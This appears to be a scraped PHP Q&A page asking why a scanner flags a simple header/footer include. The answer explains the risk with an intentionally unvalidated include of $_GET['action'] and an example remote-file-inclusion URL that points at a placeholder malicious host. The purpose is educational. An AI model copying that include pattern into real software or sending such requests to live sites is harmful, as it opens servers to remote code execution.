Home » Php » security – How come a simple PHP include file be vulnerable

security – How come a simple PHP include file be vulnerable

Posted by: admin July 12, 2020 Leave a comment

Questions:

I have a header.php and a footer.php which I include into all other pages like home, contact, about us etc.

The way I included the header and the footer file is

<?php include 'inc/header.php';
some code
some code
include 'inc/header.php'; ?>

Everything simple and works fine.

I decided to check my project for vulnerability and downloaded RIPS scanner. After the scan, the result

Userinput reaches sensitive sink.

5: include include 'inc/header.php';  // header.php
requires:
     5: if(!in_array($_GET['file'], $files)) else

which basically say that both header and footer are vulnerable and I should use

if(!in_array($_GET['file'], $files)) else

How come a simple include header and footer file be vulnerable? and if vulnerable, how should i implement if(!in_array($_GET[‘file’], $files)) else ??

header.php

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
    <title></title>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <link rel="icon" href="images/common/lbfavicon.ico" />
    <meta name="author" content="example.com" />
    <link rel="stylesheet" type="text/css" href="template/css/reset.css" media="screen" />
    <link rel="stylesheet" type="text/css" href="template/css/layout.css" media="screen"/>
</head>

<body>
    <div id="header-wrapper">
        <div class="container">
            <div id="nav">
                <ul>
                    <li><a href="./">Home</a></li>
                    <li><a href="index.php?page=about">About</a></li>
                    <li><a href="index.php?page=contact">Contact</a></li>
                </ul>
            </div><!-- nav ends -->
        </div><!-- container ends -->
    </div><!-- header wrapper ends -->

    <div id="header">
        <div class="container">
            <div id="logo">
                <a href="./"><img src="template/images/logo.png" width="125" height="45" alt="logo" /></a>
            </div><!-- logo ends -->
            <div id="search">
                <form method="get" action="searchresult.php">
                    <div class="form-item">
                       Search: <input  type="text" maxlength="120" name="searchfor" />
                    </div>
                </form>
            </div><!-- search ends -->
        </div><!-- container ends-->
    </div><!-- header ends -->

    <div class="container">
        <div id="announcement">
            <div id="breadcrumbs"></div>
        </div><!-- announcement ends -->
        <div id="pagewrapper">

Footer.php

        <div id="bottom">
            <div class="column">
                <h2>Abc.com</h2>
                    <ul>
                        <li><a href="about">About</a></li>
                        <li><a href="contact">Contact</a></li>
                    </ul>
            </div>

            <div class="column">
                <h2>Mode of payment</h2>
                    <ul>
                        <li>Credit/Debit card | Cheque | Demand draft</li>
                    </ul>
                <h2>Get in touch</h2>
                    <ul>
                        <li><img src="template/images/facebook.png" width="32" height="32" alt="facebook" /></li>
                    </ul>
            </div>

            <div class="column">
                <h2>Call us / Mail us</h2>
                    <ul>
                        <li>0-9999384745 / <a href="mailto:[email protected]">[email protected]</a></li>
                    </ul>
                <h2>Share us</h2>
                    <ul>
                        <li><img src="template/images/facebook.png" width="32" height="32" alt="facebook" /></li>
                    </ul>
            </div>

            <div style="clear: both;"></div>
        </div> <!-- bottom ends -->

        <div id="footer">

        </div>

        </div> <!--Pagewrapper end-->
    </div>    
</body>
</html>
How to&Answers:

Well I suppose this is just a warning but in a global way, when you include .php scripts which names come from user input, you should absolutely check if the names provided are correct or not (to prevent security issues).

For example, a lot of websites use a “global” file that would include file according to requests coming from the user.

Example :

<?php

$get = $_GET['action'];
if ($get == "index") {
   include "includes/index.php";
}
//...
else
{
   include $get .".php";
}

Now let’s imagine someone want to include some malicious script within your website. If your server allow cross-website requests, then people could specify some external script that could be dangerous for your server or the others users.

Example : ./global.php?action=http://malicious4ever.com/dirtything